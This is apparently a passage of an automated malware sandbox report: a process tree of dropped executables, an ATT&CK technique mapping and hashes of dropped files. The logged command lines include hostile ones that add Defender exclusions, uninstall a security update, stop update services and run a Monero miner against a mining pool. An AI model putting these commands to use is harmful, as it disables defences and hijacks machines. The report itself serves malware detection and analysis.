                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 1460
                                                        9⤵
                                                        • Program crash
                                                        PID:6020
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "RqNf4VbygaZMscPSdJ09c7tQ.exe" /f & erase "C:\Users\Admin\Pictures\RqNf4VbygaZMscPSdJ09c7tQ.exe" & exit
                                                        9⤵
                                                          PID:5272
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /im "RqNf4VbygaZMscPSdJ09c7tQ.exe" /f
                                                            10⤵
                                                            • Kills process with taskkill
                                                            PID:5088
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 1480
                                                          9⤵
                                                          • Program crash
                                                          PID:5328
                                                      • C:\Users\Admin\Pictures\I0QTGu0KxHteQfGRuRjCRJd3.exe
                                                        "C:\Users\Admin\Pictures\I0QTGu0KxHteQfGRuRjCRJd3.exe"
                                                        8⤵
                                                        • Executes dropped EXE
                                                        PID:952
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -nologo -noprofile
                                                          9⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          PID:3328
                                                        • C:\Users\Admin\Pictures\I0QTGu0KxHteQfGRuRjCRJd3.exe
                                                          "C:\Users\Admin\Pictures\I0QTGu0KxHteQfGRuRjCRJd3.exe"
                                                          9⤵
                                                            PID:5740
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -nologo -noprofile
                                                              10⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:1932
                                                        • C:\Users\Admin\Pictures\EX5hEExR23u8bQ8FVeq4iUHS.exe
                                                          "C:\Users\Admin\Pictures\EX5hEExR23u8bQ8FVeq4iUHS.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:2464
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -nologo -noprofile
                                                            9⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            PID:3588
                                                          • C:\Users\Admin\Pictures\EX5hEExR23u8bQ8FVeq4iUHS.exe
                                                            "C:\Users\Admin\Pictures\EX5hEExR23u8bQ8FVeq4iUHS.exe"
                                                            9⤵
                                                              PID:5768
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -nologo -noprofile
                                                                10⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                PID:4976
                                                          • C:\Users\Admin\Pictures\kXU9T6OezH270L29XvgqgDWQ.exe
                                                            "C:\Users\Admin\Pictures\kXU9T6OezH270L29XvgqgDWQ.exe" /s
                                                            8⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Writes to the Master Boot Record (MBR)
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4612
                                                          • C:\Users\Admin\Pictures\UMRGBizA6D4UPOtMTb6qHqZr.exe
                                                            "C:\Users\Admin\Pictures\UMRGBizA6D4UPOtMTb6qHqZr.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:3176
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -nologo -noprofile
                                                              9⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:1848
                                                            • C:\Users\Admin\Pictures\UMRGBizA6D4UPOtMTb6qHqZr.exe
                                                              "C:\Users\Admin\Pictures\UMRGBizA6D4UPOtMTb6qHqZr.exe"
                                                              9⤵
                                                                PID:5712
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -nologo -noprofile
                                                                  10⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  PID:2124
                                                            • C:\Users\Admin\Pictures\6eba2j5P3QNMmAvIyBrNVxzX.exe
                                                              "C:\Users\Admin\Pictures\6eba2j5P3QNMmAvIyBrNVxzX.exe"
                                                              8⤵
                                                              • Executes dropped EXE
                                                              PID:752
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -nologo -noprofile
                                                                9⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                PID:3756
                                                              • C:\Users\Admin\Pictures\6eba2j5P3QNMmAvIyBrNVxzX.exe
                                                                "C:\Users\Admin\Pictures\6eba2j5P3QNMmAvIyBrNVxzX.exe"
                                                                9⤵
                                                                  PID:5684
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -nologo -noprofile
                                                                    10⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    PID:4584
                                                              • C:\Users\Admin\Pictures\Pfip9ctJaPLvTh61DpxA5MKV.exe
                                                                "C:\Users\Admin\Pictures\Pfip9ctJaPLvTh61DpxA5MKV.exe"
                                                                8⤵
                                                                  PID:3456
                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                7⤵
                                                                  PID:4940
                                                        • C:\Users\Admin\1000006002\f30fc097f7.exe
                                                          "C:\Users\Admin\1000006002\f30fc097f7.exe"
                                                          3⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Executes dropped EXE
                                                          • Checks whether UAC is enabled
                                                          PID:4840
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4056 -ip 4056
                                                      1⤵
                                                        PID:1452
                                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                        "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                        1⤵
                                                        • Executes dropped EXE
                                                        PID:2708
                                                        • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                          "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          PID:3356
                                                          • C:\Windows\Temp\134108.exe
                                                            "C:\Windows\Temp\134108.exe" --list-devices
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            PID:4824
                                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                        "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                        1⤵
                                                        • Executes dropped EXE
                                                        PID:2776
                                                        • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                          "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          PID:3624
                                                      • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                        C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                        1⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:1692
                                                      • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                        C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                        1⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Checks whether UAC is enabled
                                                        PID:3504
                                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                        "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                        1⤵
                                                        • Executes dropped EXE
                                                        PID:3596
                                                        • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
                                                          "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          PID:764
                                                          • C:\Windows\Temp\323142.exe
                                                            "C:\Windows\Temp\323142.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:492
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2392 -ip 2392
                                                        1⤵
                                                          PID:3856
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2392 -ip 2392
                                                          1⤵
                                                            PID:956
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3584 -ip 3584
                                                            1⤵
                                                              PID:4648
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2392 -ip 2392
                                                              1⤵
                                                                PID:3928
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2392 -ip 2392
                                                                1⤵
                                                                  PID:1188
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2392 -ip 2392
                                                                  1⤵
                                                                    PID:3388
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2392 -ip 2392
                                                                    1⤵
                                                                      PID:3440
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2392 -ip 2392
                                                                      1⤵
                                                                        PID:2128
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2392 -ip 2392
                                                                        1⤵
                                                                          PID:740
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2392 -ip 2392
                                                                          1⤵
                                                                            PID:2892
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2392 -ip 2392
                                                                            1⤵
                                                                              PID:4680
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2392 -ip 2392
                                                                              1⤵
                                                                                PID:4052
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4532 -ip 4532
                                                                                1⤵
                                                                                  PID:3324
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4532 -ip 4532
                                                                                  1⤵
                                                                                    PID:2036
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4532 -ip 4532
                                                                                    1⤵
                                                                                      PID:4956
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4532 -ip 4532
                                                                                      1⤵
                                                                                        PID:1932
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4532 -ip 4532
                                                                                        1⤵
                                                                                          PID:4508
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4532 -ip 4532
                                                                                          1⤵
                                                                                            PID:1692
                                                                                          • C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                            C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                            1⤵
                                                                                              PID:4344
                                                                                              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                2⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                PID:2036
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                2⤵
                                                                                                  PID:5832
                                                                                                  • C:\Windows\system32\wusa.exe
                                                                                                    wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                    3⤵
                                                                                                      PID:5964
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                    2⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:5840
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                    2⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:5908
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    C:\Windows\system32\sc.exe stop wuauserv
                                                                                                    2⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:5988
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    C:\Windows\system32\sc.exe stop bits
                                                                                                    2⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:6048
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    C:\Windows\system32\sc.exe stop dosvc
                                                                                                    2⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:6100
                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                    2⤵
                                                                                                      PID:6140
                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                      2⤵
                                                                                                        PID:992
                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                        2⤵
                                                                                                          PID:4968
                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                          2⤵
                                                                                                            PID:4480
                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                            C:\Windows\system32\conhost.exe
                                                                                                            2⤵
                                                                                                              PID:660
                                                                                                            • C:\Windows\explorer.exe
                                                                                                              explorer.exe
                                                                                                              2⤵
                                                                                                                PID:3008
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4532 -ip 4532
                                                                                                              1⤵
                                                                                                                PID:4808
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4532 -ip 4532
                                                                                                                1⤵
                                                                                                                  PID:2104
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 4532 -ip 4532
                                                                                                                  1⤵
                                                                                                                    PID:5244
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                                    1⤵
                                                                                                                      PID:5312
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                      1⤵
                                                                                                                        PID:5320
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                        1⤵
                                                                                                                          PID:5372
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4532 -ip 4532
                                                                                                                          1⤵
                                                                                                                            PID:5956
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4532 -ip 4532
                                                                                                                            1⤵
                                                                                                                              PID:5292
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                              1⤵
                                                                                                                                PID:3312
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                1⤵
                                                                                                                                  PID:2860

                                                                                                                                Network

                                                                                                                                MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                Execution

                                                                                                                                Command and Scripting Interpreter

                                                                                                                                1
                                                                                                                                T1059

                                                                                                                                PowerShell

                                                                                                                                1
                                                                                                                                T1059.001

                                                                                                                                System Services

                                                                                                                                2
                                                                                                                                T1569

                                                                                                                                Service Execution

                                                                                                                                2
                                                                                                                                T1569.002

                                                                                                                                Scheduled Task/Job

                                                                                                                                1
                                                                                                                                T1053

                                                                                                                                Persistence

                                                                                                                                Create or Modify System Process

                                                                                                                                3
                                                                                                                                T1543

                                                                                                                                Windows Service

                                                                                                                                3
                                                                                                                                T1543.003

                                                                                                                                Boot or Logon Autostart Execution

                                                                                                                                1
                                                                                                                                T1547

                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                1
                                                                                                                                T1547.001

                                                                                                                                Pre-OS Boot

                                                                                                                                1
                                                                                                                                T1542

                                                                                                                                Bootkit

                                                                                                                                1
                                                                                                                                T1542.003

                                                                                                                                Scheduled Task/Job

                                                                                                                                1
                                                                                                                                T1053

                                                                                                                                Privilege Escalation

                                                                                                                                Create or Modify System Process

                                                                                                                                3
                                                                                                                                T1543

                                                                                                                                Windows Service

                                                                                                                                3
                                                                                                                                T1543.003

                                                                                                                                Boot or Logon Autostart Execution

                                                                                                                                1
                                                                                                                                T1547

                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                1
                                                                                                                                T1547.001

                                                                                                                                Scheduled Task/Job

                                                                                                                                1
                                                                                                                                T1053

                                                                                                                                Defense Evasion

                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                2
                                                                                                                                T1497

                                                                                                                                Impair Defenses

                                                                                                                                2
                                                                                                                                T1562

                                                                                                                                Disable or Modify System Firewall

                                                                                                                                1
                                                                                                                                T1562.004

                                                                                                                                Modify Registry

                                                                                                                                2
                                                                                                                                T1112

                                                                                                                                Pre-OS Boot

                                                                                                                                1
                                                                                                                                T1542

                                                                                                                                Bootkit

                                                                                                                                1
                                                                                                                                T1542.003

                                                                                                                                Subvert Trust Controls

                                                                                                                                1
                                                                                                                                T1553

                                                                                                                                Install Root Certificate

                                                                                                                                1
                                                                                                                                T1553.004

                                                                                                                                Credential Access

                                                                                                                                Unsecured Credentials

                                                                                                                                2
                                                                                                                                T1552

                                                                                                                                Credentials In Files

                                                                                                                                2
                                                                                                                                T1552.001

                                                                                                                                Discovery

                                                                                                                                Query Registry

                                                                                                                                5
                                                                                                                                T1012

                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                2
                                                                                                                                T1497

                                                                                                                                System Information Discovery

                                                                                                                                4
                                                                                                                                T1082

                                                                                                                                Peripheral Device Discovery

                                                                                                                                1
                                                                                                                                T1120

                                                                                                                                Collection

                                                                                                                                Data from Local System

                                                                                                                                2
                                                                                                                                T1005

                                                                                                                                Command and Control

                                                                                                                                Web Service

                                                                                                                                1
                                                                                                                                T1102

                                                                                                                                Impact

                                                                                                                                Service Stop

                                                                                                                                1
                                                                                                                                T1489

                                                                                                                                Replay Monitor

                                                                                                                                Loading Replay Monitor...

                                                                                                                                Downloads

                                                                                                                                • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                  Filesize

                                                                                                                                  288KB

                                                                                                                                  MD5

                                                                                                                                  d9ec6f3a3b2ac7cd5eef07bd86e3efbc

                                                                                                                                  SHA1

                                                                                                                                  e1908caab6f938404af85a7df0f80f877a4d9ee6

                                                                                                                                  SHA256

                                                                                                                                  472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c

                                                                                                                                  SHA512

                                                                                                                                  1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

                                                                                                                                • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                                                                                                  Filesize

                                                                                                                                  2.5MB

                                                                                                                                  MD5

                                                                                                                                  e6943a08bb91fc3086394c7314be367d

                                                                                                                                  SHA1

                                                                                                                                  451d2e171f906fa6c43f8b901cd41b0283d1fa40

                                                                                                                                  SHA256

                                                                                                                                  aafdcfe5386452f4924cfcc23f2cf7eccf3f868947ad7291a77b2eca2af0c873

                                                                                                                                  SHA512

                                                                                                                                  505d3c76988882602f06398e747c4e496ecad9df1b7959069b87c8111c4d9118484f4d6baef5f671466a184c8caec362d635da210fa0987ccb746cbeea218d2a

                                                                                                                                • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                                                                                                  Filesize

                                                                                                                                  13.2MB

                                                                                                                                  MD5

                                                                                                                                  72b396a9053dff4d804e07ee1597d5e3

                                                                                                                                  SHA1

                                                                                                                                  5ec4fefa66771613433c17c11545c6161e1552d5

                                                                                                                                  SHA256

                                                                                                                                  d0b206f0f47a9f8593b6434dc27dadde8480a902e878882fa8c73fc7fe01b11d

                                                                                                                                  SHA512

                                                                                                                                  ad96c9ca2feae7af7fcf01a843d5aa6cbdde0520d68dedff44554a17639c6c66b2301d73daf272708cb76c22eae2d5c89db23af45105c4f0e35f4787f98e192b

                                                                                                                                • C:\Program Files (x86)\GameSyncLink\installc.bat
                                                                                                                                  Filesize

                                                                                                                                  301B

                                                                                                                                  MD5

                                                                                                                                  998ab24316795f67c26aca0f1b38c8ce

                                                                                                                                  SHA1

                                                                                                                                  a2a6dc94e08c086fe27f8c08cb8178e7a64f200d

                                                                                                                                  SHA256

                                                                                                                                  a468b43795f1083fb37b12787c5ff29f8117c26ac35af470084e00c48280442e

                                                                                                                                  SHA512

                                                                                                                                  7c9c2ade898a8defb6510ddd15730bec859d4474071eb6b8e8738ea6089764f81924ad2a6ebf0479d4fed7d61890edaa38f4bfbf70a4e6b30d33aa5bfc5b5c75

                                                                                                                                • C:\Program Files (x86)\GameSyncLink\installg.bat
                                                                                                                                  Filesize

                                                                                                                                  284B

                                                                                                                                  MD5

                                                                                                                                  5dee3cbf941c5dbe36b54690b2a3c240

                                                                                                                                  SHA1

                                                                                                                                  82b9f1ad3ca523f3794e052f7e67ecdcd1ae87e1

                                                                                                                                  SHA256

                                                                                                                                  98370b86626b8fd7a7cac96693348045b081326c49e2421113f49a5ea3588edb

                                                                                                                                  SHA512

                                                                                                                                  9ee431d485e2f09268a22b287b0960859d2f22db8c7e61309a042999c436b3de74f5d75837b739e01122a796ad65bc6468d009ec6ddf4962f4ff288155410556

                                                                                                                                • C:\Program Files (x86)\GameSyncLink\installm.bat
                                                                                                                                  Filesize

                                                                                                                                  218B

                                                                                                                                  MD5

                                                                                                                                  94b87b86dc338b8f0c4e5869496a8a35

                                                                                                                                  SHA1

                                                                                                                                  2584e6496d048068f61ac72f5c08b54ad08627c3

                                                                                                                                  SHA256

                                                                                                                                  2928d8e9a41f39d3802cfd2900d8edeb107666baa942d9c0ffbfd0234b5e5bfc

                                                                                                                                  SHA512

                                                                                                                                  b67eb73fe51d4dba990789f1e0123e902dac6d26569851c3d51ca0a575221ce317f973999d962669016017d8f81a01f11bd977609e66bb1b244334bce2db5d5d

                                                                                                                                • C:\Users\Admin\1000006002\f30fc097f7.exe
                                                                                                                                  Filesize

                                                                                                                                  2.2MB

                                                                                                                                  MD5

                                                                                                                                  0fe990118f5a433b4b9ca4b6a793126b

                                                                                                                                  SHA1

                                                                                                                                  b3a6c68b192e824c829d1f3e65b191b2e43ceac0

                                                                                                                                  SHA256

                                                                                                                                  db14219787a1d54975fffeb8aee5293530f196f95f10b40fe3276d24c44c8715

                                                                                                                                  SHA512

                                                                                                                                  c8c07e9de5ea2e6a7f034f653f411754e6b6e687111472027712c81337b56f28bd3e44dc0b3c6324c9644c3deebc8da6ab960dfdf225a8711fecf9e5f3be21f6

                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\[email protected]
                                                                                                                                  Filesize

                                                                                                                                  654B

                                                                                                                                  MD5

                                                                                                                                  5cdfc4b9de66db60219b702987b6884f

                                                                                                                                  SHA1

                                                                                                                                  3f664159cd6af48abc3f4c4a2d0ec16ff715b208

                                                                                                                                  SHA256

                                                                                                                                  9a52a5e9dcfcc59699cab7a8777c114d2b9685e68b00502c0bfb28b42ef3321d

                                                                                                                                  SHA512

                                                                                                                                  3c14da8a340736a697b4b2188b1b250b7328278a11e3483cc684247a2c10fc2b69435013e2704275dae319d992a048ff66a074065e91e9a2f65cfbd24a874d1d

                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini
                                                                                                                                  Filesize

                                                                                                                                  830B

                                                                                                                                  MD5

                                                                                                                                  a483da8b27289fc9cc49d6b17e61cbf6

                                                                                                                                  SHA1

                                                                                                                                  2d4a5a704c2ff332df6436b7bcd16365f03c2a97

                                                                                                                                  SHA256

                                                                                                                                  f7785d4e80691cb2bb59301fe8962e50862c44d8992a0e308f86689b7ee76911

                                                                                                                                  SHA512

                                                                                                                                  e0d061a5ed7c7789d11331b192c0693e9a49398de371153d1d13a8b7a32ae7078ea103b03a535ebd0581f1d9d56bacf77b9e31f68ab1888663111e8d2afea0a9

                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
                                                                                                                                  Filesize

                                                                                                                                  2.7MB

                                                                                                                                  MD5

                                                                                                                                  31841361be1f3dc6c2ce7756b490bf0f

                                                                                                                                  SHA1

                                                                                                                                  ff2506641a401ac999f5870769f50b7326f7e4eb

                                                                                                                                  SHA256

                                                                                                                                  222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee

                                                                                                                                  SHA512

                                                                                                                                  53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019

                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
                                                                                                                                  Filesize

                                                                                                                                  402KB

                                                                                                                                  MD5

                                                                                                                                  7f981db325bfed412599b12604bd00ab

                                                                                                                                  SHA1

                                                                                                                                  9f8a8fd9df3af3a4111e429b639174229c0c10cd

                                                                                                                                  SHA256

                                                                                                                                  043839a678bed1b10be00842eae413f5ecd1cad7a0eaa384dd80bc1dcd31e69b

                                                                                                                                  SHA512

                                                                                                                                  a5be61416bc60669523e15213098a6d3bb5a2393612b57863fedfa1ff974bc110e0b7e8aadc97d0c9830a80798518616f9edfb65ae22334a362a743b6af3a82d

                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
                                                                                                                                  Filesize

                                                                                                                                  1.8MB

                                                                                                                                  MD5

                                                                                                                                  2307c3f2702a53fdc03bf2f05fe51a25

                                                                                                                                  SHA1

                                                                                                                                  5d31c179f4d5e0831fb5ad877fbfe8fe6b88a26d

                                                                                                                                  SHA256

                                                                                                                                  3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77

                                                                                                                                  SHA512

                                                                                                                                  14c7feba21ae7b6b3e3d1bf06a8dea88c784ba1e5e86ffd9724be66ef880bfb89c66ae5f906e1d7c9fc18635b892ec32255ecad57dd71c11d4e40a2f9922e6bf

                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
                                                                                                                                  Filesize

                                                                                                                                  304KB

                                                                                                                                  MD5

                                                                                                                                  9faf597de46ed64912a01491fe550d33

                                                                                                                                  SHA1

                                                                                                                                  49203277926355afd49393782ae4e01802ad48af

                                                                                                                                  SHA256

                                                                                                                                  0854678d655668c8ebb949c990166e26a4c04aef4ecf0191a95693ca150a9715

                                                                                                                                  SHA512

                                                                                                                                  ef8a7a8566eaf962c4e21d49d9c1583ed2cdc9c2751ce75133a9765d2fa6dc511fc6cc99ea871eb83d50bd08a31cb0b25c03f27b8e6f351861231910a6cf1a1e

                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
                                                                                                                                  Filesize

                                                                                                                                  4.2MB

                                                                                                                                  MD5

                                                                                                                                  0f52e5e68fe33694d488bfe7a1a71529

                                                                                                                                  SHA1

                                                                                                                                  11d7005bd72cb3fd46f24917bf3fc5f3203f361f

                                                                                                                                  SHA256

                                                                                                                                  efd29c35766c607aa15d1cb83dec625739791b1616ad37d5b47e78cdb8a42ca8

                                                                                                                                  SHA512

                                                                                                                                  238fbb1c04eef2f2005cb7abf0223e3cd062d9d2840966292e19dcaa495609e134a0bdc35389ae9925ecfc787a13772d3ac7b29058579f702bc849dd0343c400

                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
                                                                                                                                  Filesize

                                                                                                                                  1.0MB

                                                                                                                                  MD5

                                                                                                                                  808c0214e53b576530ee5b4592793bb0

                                                                                                                                  SHA1

                                                                                                                                  3fb03784f5dab1e99d5453664bd3169eff495c97

